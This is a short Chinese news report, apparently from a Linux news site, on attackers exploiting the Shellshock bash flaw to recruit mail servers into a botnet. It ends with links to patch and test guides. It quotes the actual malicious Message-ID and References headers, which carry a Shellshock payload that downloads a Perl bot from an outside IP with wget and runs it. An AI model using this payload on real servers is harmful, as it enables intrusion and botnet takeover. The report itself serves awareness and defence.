攻击者利用Shellshock漏洞入侵邮件服务器

攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求，诱骗bash远程执行命令。安全研究人员报告，攻击者向邮件服务器发送特定的消息头字段，诱骗服务器执行一个 Perl脚本，成为僵尸网络的一部分。邮件消息头的构成是： Message-ID:（） { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
References:（） { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend Gitlab-shell 受 Bash CVE-2014-6271 漏洞影响 http://www.linuxidc.com/Linux/2014-09/107181.htmLinux再曝安全漏洞Bash 比心脏出血还严重 http://www.linuxidc.com/Linux/2014-09/107176.htm解决办法是升级 Bash，请参考这篇文章。http://www.linuxidc.com/Linux/2014-09/107182.htmBash远程解析命令执行漏洞测试方法 http://www.linuxidc.com/Linux/2014-09/107289.htmBash漏洞最新补丁安装教程【附下载】 http://www.linuxidc.com/Linux/2014-10/107851.htm破壳漏洞（Shellshock）修复详解 http://www.linuxidc.com/Linux/2014-10/107925.htm